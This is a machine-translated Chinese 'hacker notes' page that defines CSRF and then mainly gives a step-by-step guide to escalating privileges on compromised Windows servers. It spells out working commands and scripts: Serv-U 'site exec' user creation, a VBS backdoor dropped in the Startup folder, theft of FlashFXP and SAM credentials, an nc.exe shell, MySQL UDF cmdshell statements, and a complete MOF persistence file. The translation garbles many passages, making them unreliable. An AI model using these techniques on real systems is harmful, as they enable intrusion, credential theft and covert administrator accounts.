Hacker_ Notes _ Industry terminology

Reference Links:

Http://bbs.51cto.com/thread-623419-1.html

Csrf:

Cross-site Request forgery

Relying on the user identity to compromise the Web site to use the Web site to the user identity of the trust to deceive users of the browser to send HTTP requests to the target site in addition, the IMG tag can trigger a GET request, you can use it to implement the CSRF attack. right to raise:Improve their permissions in the server, mainly for the site intrusion process, when the intrusion of a Web site, through a variety of vulnerabilities to elevate Webshell permissions to seize the server permissions. The main methods of right-of-reference are as follows:FirstIf the server has installed the PcAnywhere service side, the administrator for the convenience of management also gave us the convenience, to the system disk documents and Settings/all users/application Data/symantec/pcanywhere /download *.cif local hack to use the pcanywhere connection on it.SecondGeneral server Management is the design of the machine and then uploaded to the space, then will use the FTP, the server uses the most is SERVU then we use SERVU to elevate permissions through the SERVU to elevate permissions need to SERVU installation directory can write ~ good start, First through the Webshell access to the SERVU installation folder under the Servudaemon.ini download him down, and then install a SERVU on this machine to the local installation folder to overwrite, start Servudaemon.ini add a user, set as system administrator, directory C : \, with executable permissions and then go to the SERVU installation directory to replace the Servudaemon.ini on the server. Connect Ftpftp>open ipconnected to ip.220 serv-u FTP Server v5.0.0.4 for WinSock ready ... with my new user and password. User (IP: (none)): ID//Users just added 331 username Okay, please send complete e-mail address as password. Password:password//password User logged in, proceed.ftp> CD winnt//Enter Win2K directory Winnt changed CD system32//Enter System32 directory changed to/winnt/system32ftp>quote site exec net.exe user Rover Rover1234/add Use the system's Net.exe files to add users. If the prompt does not have permission, then we pass the back door (Server.exe) to his system32 directory and then write a VBS script SETWSHSHELL=CREATEOBJECT ("Wscript.Shell") A=wshshell.run (" cmd.exe/c NET user User Pass/add ", 0) b=wshshell.run (" cmd.exe/c net localgroup Administrators User/add ", 0) b=wshshell.ru N ("cmd.exe/c Server.exe", 0) Save as xx.vbe the role of this script is to buildThe user password is passed and promoted to an administrator and then executes the Server.exe in the System32 directory to send this textbook C:\Documents and Settings\All users\"Start menu \ programs \ Start the directory so the administrator will execute the textbook as soon as they log in. The next step is to wait for him to land.Thirdis to first check what system services, or with the system start automatically start programs and administrators often use the software, such as Norton, Vadministrator, Jinshan, rising, winrar even QQ and so on, whether you can write, if you can modify its program, binding a batch or VBS, Then wait for the server to restart.FourthFind Conn and config, pass this type of file to see if you can get SA or MySQL password, there may be some gains and so on.FifthUsing FLASHFXP can also elevate permissions, but the success rate depends on your own luck. First find the FlashFXP folder and open (edit) Sites. DAT, this file is something that is password and username, and the password is secret. If I copy these files back to my computer locally, replace the corresponding files locally. You will then find that opening FLASHFXP is the same as opening the site manager in a site. Also can add n more broiler ~ ~ Hee ~ eh?? No, it is to elevate the authority of Ah, dizzy, and then do not give up halfway. Everybody look at the other side administrator's this site manager, has the user name and the password, the password is the asterisk. After using the XP Asterisk password Viewer to view, and then encrypt the password in the Sites.dat to compare the discovery is not encrypted but found that the password is clear text display, and then finally the webmaster's password from this pile of things to find out. Then the next step can be linked to these new servers ~ ~ After testing as long as the password and user name of the Sites.dat file to the local corresponding file can be locally restored to the other administrator's password at each site.Sixthwin2k+iis5.0 The Application Protection option is "medium (Pooled)" By default, and IIS load ISAPI is executed with the IWAM_computername user identity. By default, however, WIN2K+IIS5 is loaded with the system identity for some special ISAPI. WIN2K+IIS5, WIN2K+IIS5+SP1, win2k+iis5+sp2 are simple to determine the name of the ISAPI file, and do not do directory restrictions, the system permissions to load the ISAPI has: 1, idq.dll2, Httpext.dll3, HTTPODBC.DLL4, Ssinc.dll5, Msw3prt.dll6, Author.dll7, Admin.dll8, Shtml.dll9, Sspifilt.dll10, Compfilt.dll11, Pwsdata.dll12, Md5filt.dll13, Fpexedll.dll so it's easy to get system permissions with this. and determine the file name when there is a bug, such as the request/scripts/test%81%5cssinc.dll will also be considered as the ssinc.dll of the request, that is, the separation of the file path does not take into account the double-byte version of the Far East issue. Ssinc.dll in the processing of the include file path also has a problem, that is "/", "\" only recognize a "/", so if the request inside use "\", will be wrong to handle the include file path, there is the possibility of leaking something or a permission vulnerability, this vulnerability many other places (PHP, ASP, etc.) also exists. Loading these ISAPI is not based on the file name alone, but instead adds the path, should be fixed this problem. Generally by default is: 1, idq.dlld:\winnt\system32\idq.dll2, Httpext.dll d:\winnt\system32\inetsrv\httpext.dll3, Httpodbc.dll d:\ WINNT\SYSTEM32\INETSRV\HTTPODBC.DLL4, Ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll5, Msw3prt.dll d:\winnt\ SYSTEM32\MSW3PRT.DLL6, Author.dll D:\Program files\common Files\Microsoft Shared\Web server Extensions\40\isapi\_vti_ Aut\author.dll7, Admin.dll D:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\isapi\_vti_adm\admin.dll8, Shtml.dll D:\Program Files\Common Files\Microsoft Shared\Web server Extensions\40\isapi\shtml.dll9, Sspifilt.dll d:\ Winnt\system32\inetsrv\sspifilt.dll10, Compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll11, Pwsdata.dll d:\winnt \SYSTEM32\INETSRV\PWSDATA.DLL12, Md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll13, Fpexedll.dll D:\Program Files \common Files\Microsoft Shared\Web Server Extensions\40\bin\fpexedll.dll Normally these paths are guest cannot write, but if the configuration is not good, these paths IIS User can write the same can be elevated permissions can upload ISAPIHack.dll to IIS executable directory, the file name can be called Ssinc.dll or admin.dll, etc. (one of the 13 filenames listed above). Then wait for IIS to reboot to load this DLL and get permission.SeventhDownload the system%windir%\repair\sam.* (WinNT 4 is sam._ and Windows 2000 is Sam) file, and then use L0PHT and other software to crack, as long as you can get, Ken spent time, it will be able to crack.EighthPipeupadmin (under Windows 2000), the current user account can be added to the Administrators group when running natively. Both normal users and Guests group users can run successfully.NinethServ-u Ftp Server Local Elevation of Privilege vulnerability: C:\Documents and Settings\All users\ documents directory for many hosts, and several subdirectories below the documents do not have permissions set. Causes the exp to be uploaded and run in this directory. The Serv-u local exploit and NC are uploaded directly, and the name of the Serv-u native elevation permission is named Su.exe file is placed in C:\Documents and Settings\All Users\ documents, and then we use Su The. exe creates a user directly, or bounces a shell over. Specific command: Build User: Serv-u.exe "cmd" >user xl>pass 111111 Bounce Shell:serv-u.exe "nc.exe-l-P 99-e cmd.exe"TenthUDF to raise rights. Use the condition: root permission of the MySQL account password. Right method: The specific statement is as follows:
Create function Cmdshell returns string Soname ' Udf.dll ';
Select Cmdshell (' Net user Iis_user 123/add ');
Select Cmdshell (' net localgroup Administrators Iis_user/add ');
Select Cmdshell (' regedit/s d:\web\3389.reg ');
Drop function Cmdshell;
Select Cmdshell (' Netstat-an ');11thMOF's right to withdraw. #pragma namespace ("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter
{
Eventnamespace = "root\\cimv2";
Name = "FiltP2";
Query = "SELECT * from __InstanceModificationEvent"
"Where targetinstance Isa \" Win32_localtime\ ""
"And Targetinstance.second = 5";
QueryLanguage = "WQL";
};instance of Activescripteventconsumer as $Consumer
{
Name = "ConsPCSV2";
Scriptingengine = "JScript";
ScriptText =
"var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user admin admin/add\ ")";
};instance of __filtertoconsumerbinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Close the Firewall service net stop "Windows firewall/internet Connection Sharing (ICS)"
Save the above as Xxx.mof
1. Find a writable directory and upload the MOF file
2. Execute SQL
Select Load_file (' C:\\recycler\\nullevt.mof ') into
DumpFile ' C:/windows/system32/wbem/mof/nullevt.mof '; tapjacking touch Screen hijackingHttp://blog.trendmicro.com/trendlabs-security-intelligence/tapjacking-an-untapped-threat-in-android/

Hacker_ Notes _ Industry terminology